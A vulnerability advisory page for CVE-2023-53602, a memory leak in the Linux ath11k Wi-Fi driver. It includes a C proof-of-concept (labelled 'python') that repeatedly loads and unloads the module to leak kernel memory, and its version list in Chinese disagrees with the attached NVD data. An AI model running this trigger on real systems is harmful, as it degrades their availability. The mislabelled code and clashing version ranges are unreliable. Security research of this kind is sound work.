Security Vulnerability Report
中文
CVE-2023-53602 CVSS 5.5 MEDIUM

CVE-2023-53602

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:24:06
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix memory leak in WMI firmware stats Memory allocated for firmware pdev, vdev and beacon statistics are not released during rmmod. Fix it by calling ath11k_fw_stats_free() function before hardware unregister. While at it, avoid calling ath11k_fw_stats_free() while processing the firmware stats received in the WMI event because the local list is getting spliced and reinitialised and hence there are no elements in the list after splicing. Tested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux内核 < 6.6(包含ath11k驱动的版本)
Linux内核 6.6.x(未修复版本)
Linux内核 6.1.x(未修复版本)
Linux内核 5.15.x(未修复版本)
Linux内核 5.10.x(未修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53602 PoC - Triggering memory leak via repeated module load/unload // This PoC demonstrates how to trigger the ath11k firmware stats memory leak // by repeatedly loading and unloading the ath11k kernel module. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> // Function to execute system command and check result int run_command(const char *cmd) { int ret = system(cmd); if (ret != 0) { fprintf(stderr, "Command failed: %s\n", cmd); return -1; } return 0; } int main(int argc, char *argv[]) { int iterations = 100; // Number of load/unload cycles int i; printf("[*] CVE-2023-53602 - ath11k Firmware Stats Memory Leak PoC\n"); printf("[*] This PoC triggers memory leak by repeated module load/unload\n\n"); if (argc > 1) { iterations = atoi(argv[1]); } printf("[*] Starting %d iterations of ath11k module load/unload\n", iterations); for (i = 0; i < iterations; i++) { printf("\r[*] Iteration %d/%d", i + 1, iterations); fflush(stdout); // Load ath11k module - triggers firmware stats allocation if (run_command("modprobe ath11k 2>/dev/null") != 0) { fprintf(stderr, "\n[!] Failed to load ath11k module. Are you root?\n"); return 1; } // Allow firmware stats to be populated sleep(2); // Unload ath11k module - should free firmware stats but doesn't (the bug) if (run_command("modprobe -r ath11k 2>/dev/null") != 0) { fprintf(stderr, "\n[!] Failed to unload ath11k module\n"); } sleep(1); } printf("\n\n[*] Completed %d iterations\n", iterations); printf("[*] Check kernel memory usage with: cat /proc/meminfo | grep Slab\n"); printf("[*] Or check with: dmesg | grep -i 'memory leak'\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53602", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.830", "lastModified": "2026-03-23T18:24:06.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix memory leak in WMI firmware stats\n\nMemory allocated for firmware pdev, vdev and beacon statistics\nare not released during rmmod.\n\nFix it by calling ath11k_fw_stats_free() function before hardware\nunregister.\n\nWhile at it, avoid calling ath11k_fw_stats_free() while processing\nthe firmware stats received in the WMI event because the local list\nis getting spliced and reinitialised and hence there are no elements\nin the list after splicing.\n\nTested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "6.1.42", "matchCriteriaId": "F9BB7262-7D7A-494E-B4BD-A00F877F774D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/55248d36beb79d3a61c9fb3122dc377fff523c89", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6aafa1c2d3e3fea2ebe84c018003f2a91722e607", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/86f9330a49d1464849482298dd34d361859183eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.